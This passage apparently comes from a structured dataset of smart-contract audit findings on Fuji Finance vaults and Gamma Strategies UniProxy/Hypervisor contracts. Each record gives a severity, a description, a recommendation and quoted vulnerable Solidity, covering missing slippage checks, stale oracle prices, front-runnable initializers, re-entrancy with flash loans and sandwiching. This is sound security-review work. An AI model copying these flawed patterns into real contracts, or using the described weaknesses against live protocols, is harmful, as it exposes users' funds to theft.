This can have unexpected effects on internal accounting and the impact of flashloan balances.\n```\nfunction setFlashCloseFee(uint64 \_newFactorA, uint64 \_newFactorB) external isAuthorized {\n flashCloseF.a = \_newFactorA;\n flashCloseF.b = \_newFactorB;\n```\nчAdd a requirement making sure that `flashCloseF.a <= flashCloseF.b`.чч```\nfunction setFlashCloseFee(uint64 \_newFactorA, uint64 \_newFactorB) external isAuthorized {\n flashCloseF.a = \_newFactorA;\n flashCloseF.b = \_newFactorB;\n```\n -Separation of concerns and consistency in vaultsчmediumчThe `FujiVaultFTM` contract contains multiple balance-changing functions. Most notably, `withdraw` is passed an `int256` denoted amount parameter. Negative values of this parameter are given to the `_internalWithdraw` function, where they trigger the withdrawal of all collateral. This approach can result in accounting mistakes in the future as, beyond a certain point in the vault's accounting, amounts are expected to be only positive. Furthermore, the concerns of withdrawing and entirely withdrawing are not separated.\nThe above issue applies analogously to the `payback` function and its dependency on `_internalPayback`.\nFor consistency, `withdrawLiq` also takes an `int256` amount parameter. This function is only accessible to the `Fliquidator` contract and withdraws collateral from the active provider. However, all occurrences of the `_withdrawAmount` parameter are cast to `uint256`.\nThe `withdraw` entry point:\n```\nfunction withdraw(int256 \_withdrawAmount) public override nonReentrant {\n updateF1155Balances();\n \_internalWithdraw(\_withdrawAmount);\n}\n```\n\n_internalWithdraw's negative amount check:\n```\nuint256 amountToWithdraw = \_withdrawAmount < 0\n ? 
providedCollateral - neededCollateral\\n : uint256(\\_withdrawAmount);\\n```\\n\\nThe `withdrawLiq` entry point for the Fliquidator:\\n```\\nfunction withdrawLiq(int256 \\_withdrawAmount) external override nonReentrant onlyFliquidator {\\n // Logic used when called by Fliquidator\\n \\_withdraw(uint256(\\_withdrawAmount), address(activeProvider));\\n IERC20Upgradeable(vAssets.collateralAsset).univTransfer(\\n payable(msg.sender),\\n uint256(\\_withdrawAmount)\\n );\\n}\\n```\\nчWe recommend splitting the `withdraw(int256)` function into two: `withdraw(uint256)` and `withdrawAll()`. These will provide the same functionality while rendering the updated code of `_internalWithdraw` easier to read, maintain, and harder to manipulate. The recommendation applies to `payback` and `_internalPayback`.\\nSimilarly, withdrawLiq's parameter should be a `uint256` to prevent unnecessary casts.чч```\\nfunction withdraw(int256 \\_withdrawAmount) public override nonReentrant {\\n updateF1155Balances();\\n \\_internalWithdraw(\\_withdrawAmount);\\n}\\n```\\n -Aave/Geist Interface declaration mismatch and unchecked return valuesчmediumчThe two lending providers, Geist & Aave, do not seem to be directly affiliated even though one is a fork of the other. However, the interfaces may likely diverge in the future. Using the same interface declaration for both protocols might become problematic with future upgrades to either protocol. The interface declaration does not seem to come from the original upstream project. The interface `IAaveLendingPool` does not declare any return values while some of the functions called in Geist or Aave return them.\\nNote: that we have not verified all interfaces for correctness. 
However, we urge the client to only use official interface declarations from the upstream projects and verify that all other interfaces match.\\nThe `ILendingPool` configured in `ProviderAave` (0xB53C1a33016B2DC2fF3653530bfF1848a515c8c5 -> implementation: 0xc6845a5c768bf8d7681249f8927877efda425baf)\\n```\\nfunction \\_getAaveProvider() internal pure returns (IAaveLendingPoolProvider) {\\n return IAaveLendingPoolProvider(0xB53C1a33016B2DC2fF3653530bfF1848a515c8c5);\\n}\\n```\\n\\nThe `IAaveLendingPool` does not declare return values for any function, while upstream does.\\n```\\n// SPDX-License-Identifier: MIT\\n\\npragma solidity ^0.8.0;\\n\\ninterface IAaveLendingPool {\\n function flashLoan(\\n address receiverAddress,\\n address[] calldata assets,\\n uint256[] calldata amounts,\\n uint256[] calldata modes,\\n address onBehalfOf,\\n bytes calldata params,\\n uint16 referralCode\\n ) external;\\n\\n function deposit(\\n address \\_asset,\\n uint256 \\_amount,\\n address \\_onBehalfOf,\\n uint16 \\_referralCode\\n ) external;\\n\\n function withdraw(\\n address \\_asset,\\n uint256 \\_amount,\\n address \\_to\\n ) external;\\n\\n function borrow(\\n address \\_asset,\\n uint256 \\_amount,\\n uint256 \\_interestRateMode,\\n uint16 \\_referralCode,\\n address \\_onBehalfOf\\n ) external;\\n\\n function repay(\\n address \\_asset,\\n uint256 \\_amount,\\n uint256 \\_rateMode,\\n address \\_onBehalfOf\\n ) external;\\n\\n function setUserUseReserveAsCollateral(address \\_asset, bool \\_useAsCollateral) external;\\n}\\n```\\n\\nMethods: `withdraw()`, `repay()` return `uint256` in the original implementation for Aave, see:\\nhttps://etherscan.io/address/0xc6845a5c768bf8d7681249f8927877efda425baf#code\\nThe `ILendingPool` configured for Geist:\\nMethods `withdraw()`, `repay()` return `uint256` in the original implementation for Geist, see:\\nhttps://ftmscan.com/address/0x3104ad2aadb6fe9df166948a5e3a547004862f90#code\\nNote: that the actual `amount` withdrawn does not 
necessarily need to match the `amount` provided with the function argument. Here's an excerpt of the upstream LendingProvider.withdraw():\\n```\\n// rest of code\\n if (amount == type(uint256).max) {\\n amountToWithdraw = userBalance;\\n }\\n// rest of code\\n return amountToWithdraw;\\n```\\n\\nAnd here's the code in Fuji that calls that method. This will break the `withdrawAll` functionality of `LendingProvider` if token `isFTM`.\\n```\\nfunction withdraw(address \\_asset, uint256 \\_amount) external payable override {\\n IAaveLendingPool aave = IAaveLendingPool(\\_getAaveProvider().getLendingPool());\\n\\n bool isFtm = \\_asset == \\_getFtmAddr();\\n address \\_tokenAddr = isFtm ? \\_getWftmAddr() : \\_asset;\\n\\n aave.withdraw(\\_tokenAddr, \\_amount, address(this));\\n\\n // convert WFTM to FTM\\n if (isFtm) {\\n address unwrapper = \\_getUnwrapper();\\n IERC20(\\_tokenAddr).univTransfer(payable(unwrapper), \\_amount);\\n IUnwrapper(unwrapper).withdraw(\\_amount);\\n }\\n}\\n```\\n\\nSimilar for `repay()`, which returns the actual amount repaid.чAlways use the original interface unless only a minimal subset of functions is used.\\nUse the original upstream interfaces of the corresponding project (link via the respective npm packages if available).\\nAvoid omitting parts of the function declaration! Especially when it comes to return values.\\nCheck return values. Use the value returned from `withdraw()` AND `repay()`чч```\\nfunction \\_getAaveProvider() internal pure returns (IAaveLendingPoolProvider) {\\n return IAaveLendingPoolProvider(0xB53C1a33016B2DC2fF3653530bfF1848a515c8c5);\\n}\\n```\\n -Missing slippage protection for rewards swapчmediumчIn `FujiVaultFTM.harvestRewards` a swap transaction is generated using a call to `SwapperFTM.getSwapTransaction`. In all relevant scenarios, this call uses a minimum output amount of zero, which de-facto deactivates slippage checks. 
Most values from harvesting rewards can thus be siphoned off by sandwiching such calls.\\n`amountOutMin` is `0`, effectively disabling slippage control in the swap method.\\n```\\ntransaction.data = abi.encodeWithSelector(\\n IUniswapV2Router01.swapExactETHForTokens.selector,\\n 0,\\n path,\\n msg.sender,\\n type(uint256).max\\n);\\n```\\n\\nOnly success required\\n```\\n// Swap rewards -> collateralAsset\\n(success, ) = swapTransaction.to.call{ value: swapTransaction.value }(swapTransaction.data);\\nrequire(success, \"failed to swap rewards\");\\n```\\nчUse a slippage check such as for liquidator swaps:\\n```\\nrequire(\\n (priceDelta \\* SLIPPAGE\\_LIMIT\\_DENOMINATOR) / priceFromOracle < SLIPPAGE\\_LIMIT\\_NUMERATOR,\\n Errors.VL\\_SWAP\\_SLIPPAGE\\_LIMIT\\_EXCEED\\n);\\n```\\n\\nOr specify a non-zero `amountOutMin` argument in calls to `IUniswapV2Router01.swapExactETHForTokens`.чч```\\ntransaction.data = abi.encodeWithSelector(\\n IUniswapV2Router01.swapExactETHForTokens.selector,\\n 0,\\n path,\\n msg.sender,\\n type(uint256).max\\n);\\n```\\n -FujiOracle - _getUSDPrice does not detect stale oracle prices; General Oracle RisksчmediumчThe external Chainlink oracle, which provides index price information to the system, introduces risk inherent to any dependency on third-party data sources. For example, the oracle could fall behind or otherwise fail to be maintained, resulting in outdated data being fed to the index price calculations. 
Oracle reliance has historically resulted in crippled on-chain systems, and complications that lead to these outcomes can arise from things as simple as network congestion.\\nThis is more extreme in lesser-known tokens with fewer ChainLink Price feeds to update the price frequently.\\nEnsuring that unexpected oracle return values are correctly handled will reduce reliance on off-chain components and increase the resiliency of the smart contract system that depends on them.\\nThe codebase, as is, relies on `chainLinkOracle.latestRoundData()` and does not check the `timestamp` or `answeredIn` round of the returned price.\\nHere's how the oracle is consumed, skipping any fields that would allow checking for stale data:\\n```\\n/\\*\\*\\n \\* @dev Calculates the USD price of asset.\\n \\* @param \\_asset: the asset address.\\n \\* Returns the USD price of the given asset\\n \\*/\\nfunction \\_getUSDPrice(address \\_asset) internal view returns (uint256 price) {\\n require(usdPriceFeeds[\\_asset] != address(0), Errors.ORACLE\\_NONE\\_PRICE\\_FEED);\\n\\n (, int256 latestPrice, , , ) = AggregatorV3Interface(usdPriceFeeds[\\_asset]).latestRoundData();\\n\\n price = uint256(latestPrice);\\n}\\n```\\n\\nHere's the implementation of the v0.6 FluxAggregator Chainlink feed with a note that timestamps should be checked.\\n```\\n\\* @return updatedAt is the timestamp when the round last was updated (i.e.\\n\\* answer was last computed)\\n```\\nчPerform sanity checks on the price returned by the oracle. If the price is older, not within configured limits, revert or handle in other means.\\nThe oracle does not provide any means to remove a potentially broken price-feed (e.g., by updating its address to `address(0)` or by pausing specific feeds or the complete oracle). The only way to pause an oracle right now is to deploy a new oracle contract. 
Therefore, consider adding minimally invasive functionality to pause the price-feeds if the oracle becomes unreliable.\\nMonitor the oracle data off-chain and intervene if it becomes unreliable.\\nOn-chain, realistically, both `answeredInRound` and `updatedAt` must be checked within acceptable bounds.\\n`answeredInRound == latestRound` - in this case, data may be assumed to be fresh while it might not be because the feed was entirely abandoned by nodes (no one starting a new round). Also, there's a good chance that many feeds won't always be super up-to-date (it might be acceptable to allow a threshold). A strict check might lead to transactions failing (race; e.g., round just timed out).\\n`roundId + threshold >= answeredInRound` - would allow a deviation of threshold rounds. This check alone might still result in stale data to be used if there are no more rounds. Therefore, this should be combined with `updatedAt + threshold >= block.timestamp`.чч```\\n/\\*\\*\\n \\* @dev Calculates the USD price of asset.\\n \\* @param \\_asset: the asset address.\\n \\* Returns the USD price of the given asset\\n \\*/\\nfunction \\_getUSDPrice(address \\_asset) internal view returns (uint256 price) {\\n require(usdPriceFeeds[\\_asset] != address(0), Errors.ORACLE\\_NONE\\_PRICE\\_FEED);\\n\\n (, int256 latestPrice, , , ) = AggregatorV3Interface(usdPriceFeeds[\\_asset]).latestRoundData();\\n\\n price = uint256(latestPrice);\\n}\\n```\\n -Unclaimed or front-runnable proxy implementationsчmediumчVarious smart contracts in the system require initialization functions to be called. The point when these calls happen is up to the deploying address. 
Deployment and initialization in one transaction are typically safe, but it can potentially be front-run if the initialization is done in a separate transaction.\\nA frontrunner can call these functions to silently take over the contracts and provide malicious parameters or plant a backdoor during the deployment.\\nLeaving proxy implementations uninitialized further aids potential phishing attacks where users might claim that - just because a contract address is listed in the official documentation/code-repo - a contract is a legitimate component of the system. At the same time, it is ‘only' a proxy implementation that an attacker claimed. For the end-user, it might be hard to distinguish whether this contract is part of the system or was a maliciously appropriated implementation.\\n```\\nfunction initialize(\\n address \\_fujiadmin,\\n address \\_oracle,\\n address \\_collateralAsset,\\n address \\_borrowAsset\\n) external initializer {\\n```\\n\\n`FujiVault` was initialized many days after deployment, and `FujiVault` inherits `VaultBaseUpgradeable`, which exposes a `delegatecall` that can be used to `selfdestruct` the contract's implementation.\\nAnother `FujiVault` was deployed by `deployer` initialized in a 2-step approach that can theoretically silently be front-run.\\ncode/artifacts/250-core.deploy:L2079-L2079\\n```\\n\"deployer\": \"0xb98d4D4e205afF4d4755E9Df19BD0B8BD4e0f148\",\\n```\\n\\nTransactions of deployer:\\nhttps://ftmscan.com/txs?a=0xb98d4D4e205afF4d4755E9Df19BD0B8BD4e0f148&p=2\\nThe specific contract was initialized 19 blocks after deployment.\\nhttps://ftmscan.com/address/0x8513c2db99df213887f63300b23c6dd31f1d14b0\\n\\n`FujiAdminFTM` (and others) don't seem to be initialized. (low priority; no risk other than potential
reputational damage)\\ncode/artifacts/250-core.deploy:L1-L7\\n```\\n{\\n \"FujiAdmin\": {\\n \"address\": \"0xaAb2AAfBFf7419Ff85181d3A846bA9045803dd67\",\\n \"deployer\": \"0xb98d4D4e205afF4d4755E9Df19BD0B8BD4e0f148\",\\n \"abi\": [\\n {\\n \"anonymous\": false,\\n```\\nчIt is recommended to use constructors wherever possible to immediately initialize proxy implementations during deploy-time. The code is only run when the implementation is deployed and affects the proxy initializations. If other initialization functions are used, we recommend enforcing deployer access restrictions or a standardized, top-level `initialized` boolean, set to `true` on the first deployment and used to prevent future initialization.\\nUsing constructors and locked-down initialization functions will significantly reduce potential developer errors and the possibility of attackers re-initializing vital system components.чч```\\nfunction initialize(\\n address \\_fujiadmin,\\n address \\_oracle,\\n address \\_collateralAsset,\\n address \\_borrowAsset\\n) external initializer {\\n```\\n -WFTM - Use of incorrect interface declarationsчlowчThe `WFTMUnwrapper` and various providers utilize the `IWETH` interface declaration for handling funds denoted in `WFTM`. However, the `WETH` and `WFTM` implementations are different. 
`WFTM` returns `uint256` values to indicate error conditions while the `WETH` contract does not.\\n```\\ncontract WFTMUnwrapper {\\n address constant wftm = 0x21be370D5312f44cB42ce377BC9b8a0cEF1A4C83;\\n\\n receive() external payable {}\\n\\n /\\*\\*\\n \\* @notice Convert WFTM to FTM and transfer to msg.sender\\n \\* @dev msg.sender needs to send WFTM before calling this withdraw\\n \\* @param \\_amount amount to withdraw.\\n \\*/\\n function withdraw(uint256 \\_amount) external {\\n IWETH(wftm).withdraw(\\_amount);\\n (bool sent, ) = msg.sender.call{ value: \\_amount }(\"\");\\n require(sent, \"Failed to send FTM\");\\n }\\n}\\n```\\n\\nThe `WFTM` contract on Fantom returns an error return value. The error return value cannot be checked when utilizing the `IWETH` interface for `WFTM`. The error return values are never checked throughout the system for `WFTM` operations. This might be intentional to allow `amount=0` on `WFTM` to act as a NOOP similar to `WETH`.\\n```\\n// convert FTM to WFTM\\nif (isFtm) IWETH(\\_tokenAddr).deposit{ value: \\_amount }();\\n```\\n\\nAlso see issues: issue 4.4, issue 4.5, issue 4.10чWe recommend using the correct interfaces for all contracts instead of partial stubs. Do not modify the original function declarations, e.g., by omitting return value declarations. 
The codebase should also check return values where possible or explicitly state why values can safely be ignored in inline comments or the function's natspec documentation block.чч```\\ncontract WFTMUnwrapper {\\n address constant wftm = 0x21be370D5312f44cB42ce377BC9b8a0cEF1A4C83;\\n\\n receive() external payable {}\\n\\n /\\*\\*\\n \\* @notice Convert WFTM to FTM and transfer to msg.sender\\n \\* @dev msg.sender needs to send WFTM before calling this withdraw\\n \\* @param \\_amount amount to withdraw.\\n \\*/\\n function withdraw(uint256 \\_amount) external {\\n IWETH(wftm).withdraw(\\_amount);\\n (bool sent, ) = msg.sender.call{ value: \\_amount }(\"\");\\n require(sent, \"Failed to send FTM\");\\n }\\n}\\n```\\n -Inconsistent isFTM, isETH checksчlowч`LibUniversalERC20FTM.isFTM()` and `LibUniversalERC20.isETH()` identifies native assets by matching against two distinct addresses while some components only check for one.\\nThe same is true for `FTM`.\\n`Flasher` only identifies a native `asset` transfer by matching `asset` against `_ETH = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE` while `univTransfer()` identifies it using `0x0 || 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE`\\n```\\nfunction callFunction(\\n address sender,\\n Account.Info calldata account,\\n bytes calldata data\\n) external override {\\n require(msg.sender == \\_dydxSoloMargin && sender == address(this), Errors.VL\\_NOT\\_AUTHORIZED);\\n account;\\n\\n FlashLoan.Info memory info = abi.decode(data, (FlashLoan.Info));\\n\\n uint256 \\_value;\\n if (info.asset == \\_ETH) {\\n // Convert WETH to ETH and assign amount to be set as msg.value\\n \\_convertWethToEth(info.amount);\\n \\_value = info.amount;\\n } else {\\n // Transfer to Vault the flashloan Amount\\n // \\_value is 0\\n IERC20(info.asset).univTransfer(payable(info.vault), info.amount);\\n }\\n```\\n\\n`LibUniversalERC20`\\n```\\nlibrary LibUniversalERC20 {\\n using SafeERC20 for IERC20;\\n\\n IERC20 private constant \\_ETH\\_ADDRESS = 
IERC20(0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE);\\n IERC20 private constant \\_ZERO\\_ADDRESS = IERC20(0x0000000000000000000000000000000000000000);\\n\\n function isETH(IERC20 token) internal pure returns (bool) {\\n return (token == \\_ZERO\\_ADDRESS || token == \\_ETH\\_ADDRESS);\\n }\\n```\\n\\n```\\nfunction univTransfer(\\n IERC20 token,\\n address payable to,\\n uint256 amount\\n) internal {\\n if (amount > 0) {\\n if (isETH(token)) {\\n (bool sent, ) = to.call{ value: amount }(\"\");\\n require(sent, \"Failed to send Ether\");\\n } else {\\n token.safeTransfer(to, amount);\\n }\\n }\\n}\\n```\\n\\nThere are multiple other instances of this\\n```\\nuint256 \\_value = vAssets.borrowAsset == ETH ? debtTotal : 0;\\n```\\nчConsider using a consistent way to identify native asset transfers (i.e. `ETH`, FTM) by using `LibUniversalERC20.isETH()`. Alternatively, the system can be greatly simplified by expecting WFTM and only working with it. This simplification will remove all special cases where the library must handle non-ERC20 interfaces.чч```\\nfunction callFunction(\\n address sender,\\n Account.Info calldata account,\\n bytes calldata data\\n) external override {\\n require(msg.sender == \\_dydxSoloMargin && sender == address(this), Errors.VL\\_NOT\\_AUTHORIZED);\\n account;\\n\\n FlashLoan.Info memory info = abi.decode(data, (FlashLoan.Info));\\n\\n uint256 \\_value;\\n if (info.asset == \\_ETH) {\\n // Convert WETH to ETH and assign amount to be set as msg.value\\n \\_convertWethToEth(info.amount);\\n \\_value = info.amount;\\n } else {\\n // Transfer to Vault the flashloan Amount\\n // \\_value is 0\\n IERC20(info.asset).univTransfer(payable(info.vault), info.amount);\\n }\\n```\\n -FujiOracle - setPriceFeed should check asset and priceFeed decimalsчlowч`getPriceOf()` assumes that all price feeds return prices with identical decimals, but `setPriceFeed` does not enforce this. 
Potential misconfigurations can have severe effects on the system's internal accounting.\\n```\\n/\\*\\*\\n \\* @dev Sets '\\_priceFeed' address for a '\\_asset'.\\n \\* Can only be called by the contract owner.\\n \\* Emits a {AssetPriceFeedChanged} event.\\n \\*/\\nfunction setPriceFeed(address \\_asset, address \\_priceFeed) public onlyOwner {\\n require(\\_priceFeed != address(0), Errors.VL\\_ZERO\\_ADDR);\\n usdPriceFeeds[\\_asset] = \\_priceFeed;\\n emit AssetPriceFeedChanged(\\_asset, \\_priceFeed);\\n}\\n```\\nчWe recommend adding additional checks to detect unexpected changes in assets' properties. Safeguard price feeds by enforcing `priceFeed` == address(0) || priceFeed.decimals() == `8`. This allows the owner to disable a `priceFeed` (setting it to zero) and otherwise ensure that the feed is compatible and indeed returns `8` decimals.чч```\\n/\\*\\*\\n \\* @dev Sets '\\_priceFeed' address for a '\\_asset'.\\n \\* Can only be called by the contract owner.\\n \\* Emits a {AssetPriceFeedChanged} event.\\n \\*/\\nfunction setPriceFeed(address \\_asset, address \\_priceFeed) public onlyOwner {\\n require(\\_priceFeed != address(0), Errors.VL\\_ZERO\\_ADDR);\\n usdPriceFeeds[\\_asset] = \\_priceFeed;\\n emit AssetPriceFeedChanged(\\_asset, \\_priceFeed);\\n}\\n```\\n -UniProxy.depositSwap - Tokens are not approved before calling Router.exactInputчhighчThe call to Router.exactInput requires the sender to pre-approve the tokens. 
We could not find any reference for that, thus we assume that a call to `UniProxy.depositSwap` will always revert.\\n```\\nrouter = ISwapRouter(\\_router);\\nuint256 amountOut;\\nuint256 swap;\\nif(swapAmount < 0) {\\n //swap token1 for token0\\n\\n swap = uint256(swapAmount \\* -1);\\n IHypervisor(pos).token1().transferFrom(msg.sender, address(this), deposit1+swap);\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit0\\n )\\n );\\n}\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n```\\nчResolution\\nFixed in GammaStrategies/[email protected]9a7a3dd by deleting the `depositSwap` function.\\nConsider approving the exact amount of input tokens before the swap.чч```\\nrouter = ISwapRouter(\\_router);\\nuint256 amountOut;\\nuint256 swap;\\nif(swapAmount < 0) {\\n //swap token1 for token0\\n\\n swap = uint256(swapAmount \\* -1);\\n IHypervisor(pos).token1().transferFrom(msg.sender, address(this), deposit1+swap);\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit0\\n )\\n );\\n}\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n```\\n -Uniproxy.depositSwap - _router should not be determined by the callerчhighч`Uniproxy.depositSwap` uses `_router` that is determined by the caller, which in turn might inject a “fake” contract, and thus may steal funds stuck in 
the `UniProxy` contract.\\nThe `UniProxy` contract has certain trust assumptions regarding the router. The router is supposed to return not less than deposit1(or deposit0) amount of tokens but that fact is never checked.\\n```\\nfunction depositSwap(\\n int256 swapAmount, // (-) token1, (+) token0 for token1; amount to swap\\n uint256 deposit0,\\n uint256 deposit1,\\n address to,\\n address from,\\n bytes memory path,\\n address pos,\\n address \\_router\\n) external returns (uint256 shares) {\\n```\\nчConsider removing the `_router` parameter from the function, and instead, use a storage variable that will be initialized in the constructor.чч```\\nfunction depositSwap(\\n int256 swapAmount, // (-) token1, (+) token0 for token1; amount to swap\\n uint256 deposit0,\\n uint256 deposit1,\\n address to,\\n address from,\\n bytes memory path,\\n address pos,\\n address \\_router\\n) external returns (uint256 shares) {\\n```\\n -Re-entrancy + flash loan attack can invalidate price checkчhighчThe `UniProxy` contract has a price manipulation protection:\\n```\\nif (twapCheck || positions[pos].twapOverride) {\\n // check twap\\n checkPriceChange(\\n pos,\\n (positions[pos].twapOverride ? positions[pos].twapInterval : twapInterval),\\n (positions[pos].twapOverride ? positions[pos].priceThreshold : priceThreshold)\\n );\\n}\\n```\\n\\nBut after that, the tokens are transferred from the user, if the token transfer allows an attacker to hijack the call-flow of the transaction inside, the attacker can manipulate the Uniswap price there, after the check happened. The Hypervisor's `deposit` function itself is vulnerable to the flash-loan attack.чMake sure the price does not change before the `Hypervisor.deposit` call. For example, the token transfers can be made at the beginning of the `UniProxy.deposit` function.чч```\\nif (twapCheck || positions[pos].twapOverride) {\\n // check twap\\n checkPriceChange(\\n pos,\\n (positions[pos].twapOverride ? 
positions[pos].twapInterval : twapInterval),\\n (positions[pos].twapOverride ? positions[pos].priceThreshold : priceThreshold)\\n );\\n}\\n```\\n -UniProxy.properDepositRatio - Proper ratio will not prevent liquidity imbalance for all possible scenariosчhighч`UniProxy.properDepositRatio` purpose is to be used as a mechanism to prevent liquidity imbalance. The idea is to compare the deposit ratio with the `hypeRatio`, which is the ratio between the tokens held by the `Hypervisor` contract. In practice, however, this function will not prevent a skewed deposit ratio in many cases. `deposit1 / deposit0` might be a huge number, while `10^16 <= depositRatio <= 10^18`, and 10^16 <= `hypeRatio` <= 10^18. Let us consider the case where `hype1 / hype0 >= 10`, that means `hypeRatio = 10^18`, and now if `deposit1 / deposit0` = 10^200 for example, `depositRatio = 10^18`, and the transaction will pass, which is clearly not intended.\\n```\\nfunction properDepositRatio(\\n address pos,\\n uint256 deposit0,\\n uint256 deposit1\\n) public view returns (bool) {\\n (uint256 hype0, uint256 hype1) = IHypervisor(pos).getTotalAmounts();\\n if (IHypervisor(pos).totalSupply() != 0) {\\n uint256 depositRatio = deposit0 == 0 ? 10e18 : deposit1.mul(1e18).div(deposit0);\\n depositRatio = depositRatio > 10e18 ? 10e18 : depositRatio;\\n depositRatio = depositRatio < 10e16 ? 10e16 : depositRatio;\\n uint256 hypeRatio = hype0 == 0 ? 10e18 : hype1.mul(1e18).div(hype0);\\n hypeRatio = hypeRatio > 10e18 ? 10e18 : hypeRatio;\\n hypeRatio = hypeRatio < 10e16 ? 
10e16 : hypeRatio;\\n return (FullMath.mulDiv(depositRatio, deltaScale, hypeRatio) < depositDelta &&\\n FullMath.mulDiv(hypeRatio, deltaScale, depositRatio) < depositDelta);\\n }\\n return true;\\n}\\n```\\nчResolution\\nFixed in GammaStrategies/[email protected]9a7a3dd by deleting the `properDepositRatio` function.\\nConsider removing the cap of [0.1,10] both for `depositRatio` and for `hypeRatio`.чч```\\nfunction properDepositRatio(\\n address pos,\\n uint256 deposit0,\\n uint256 deposit1\\n) public view returns (bool) {\\n (uint256 hype0, uint256 hype1) = IHypervisor(pos).getTotalAmounts();\\n if (IHypervisor(pos).totalSupply() != 0) {\\n uint256 depositRatio = deposit0 == 0 ? 10e18 : deposit1.mul(1e18).div(deposit0);\\n depositRatio = depositRatio > 10e18 ? 10e18 : depositRatio;\\n depositRatio = depositRatio < 10e16 ? 10e16 : depositRatio;\\n uint256 hypeRatio = hype0 == 0 ? 10e18 : hype1.mul(1e18).div(hype0);\\n hypeRatio = hypeRatio > 10e18 ? 10e18 : hypeRatio;\\n hypeRatio = hypeRatio < 10e16 ? 10e16 : hypeRatio;\\n return (FullMath.mulDiv(depositRatio, deltaScale, hypeRatio) < depositDelta &&\\n FullMath.mulDiv(hypeRatio, deltaScale, depositRatio) < depositDelta);\\n }\\n return true;\\n}\\n```\\n -UniProxy.depositSwap doesn't deposit all the users' fundsчmediumчWhen executing the swap, the minimal amount out is passed to the router (deposit1 in this example), but the actual swap amount will be `amountOut`. But after the trade, instead of depositing `amountOut`, the contract tries to deposit `deposit1`, which is lower. 
This may result in some users' funds staying in the `UniProxy` contract.\\n```\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n\\nrequire(amountOut > 0, \"Swap failed\");\\n\\nif (positions[pos].version < 2) {\\n // requires lp token transfer from proxy to msg.sender\\n shares = IHypervisor(pos).deposit(deposit0, deposit1, address(this));\\n IHypervisor(pos).transfer(to, shares);\\n}\\n```\\nчResolution\\nFixed in GammaStrategies/[email protected]9a7a3dd by deleting the `depositSwap` function.\\nDeposit all the user's funds to the Hypervisor.чч```\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n\\nrequire(amountOut > 0, \"Swap failed\");\\n\\nif (positions[pos].version < 2) {\\n // requires lp token transfer from proxy to msg.sender\\n shares = IHypervisor(pos).deposit(deposit0, deposit1, address(this));\\n IHypervisor(pos).transfer(to, shares);\\n}\\n```\\n -Hypervisor - Multiple “sandwiching” front running vectorsчmediumчThe amount of tokens received from `UniswapV3Pool` functions might be manipulated by front-runners due to the decentralized nature of AMMs, where the order of transactions can not be pre-determined. 
A potential “sandwicher” may insert a buying order before the user's call to `Hypervisor.rebalance` for instance, and a sell order after.\\nMore specifically, calls to `pool.swap`, `pool.mint`, `pool.burn` are susceptible to “sandwiching” vectors.\\n`Hypervisor.rebalance`\\n```\\nif (swapQuantity != 0) {\\n pool.swap(\\n address(this),\\n swapQuantity > 0,\\n swapQuantity > 0 ? swapQuantity : -swapQuantity,\\n swapQuantity > 0 ? TickMath.MIN\\_SQRT\\_RATIO + 1 : TickMath.MAX\\_SQRT\\_RATIO - 1,\\n abi.encode(address(this))\\n );\\n}\\n```\\n\\n```\\nfunction \\_mintLiquidity(\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity,\\n address payer\\n) internal returns (uint256 amount0, uint256 amount1) {\\n if (liquidity > 0) {\\n (amount0, amount1) = pool.mint(\\n address(this),\\n tickLower,\\n tickUpper,\\n liquidity,\\n abi.encode(payer)\\n );\\n }\\n}\\n```\\n\\n```\\nfunction \\_burnLiquidity(\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity,\\n address to,\\n bool collectAll\\n) internal returns (uint256 amount0, uint256 amount1) {\\n if (liquidity > 0) {\\n // Burn liquidity\\n (uint256 owed0, uint256 owed1) = pool.burn(tickLower, tickUpper, liquidity);\\n\\n // Collect amount owed\\n uint128 collect0 = collectAll ? type(uint128).max : \\_uint128Safe(owed0);\\n uint128 collect1 = collectAll ? type(uint128).max : \\_uint128Safe(owed1);\\n if (collect0 > 0 || collect1 > 0) {\\n (amount0, amount1) = pool.collect(to, tickLower, tickUpper, collect0, collect1);\\n }\\n }\\n}\\n```\\nчConsider adding an `amountMin` parameter(s) to ensure that at least the `amountMin` of tokens was received.чч```\\nif (swapQuantity != 0) {\\n pool.swap(\\n address(this),\\n swapQuantity > 0,\\n swapQuantity > 0 ? swapQuantity : -swapQuantity,\\n swapQuantity > 0 ? 
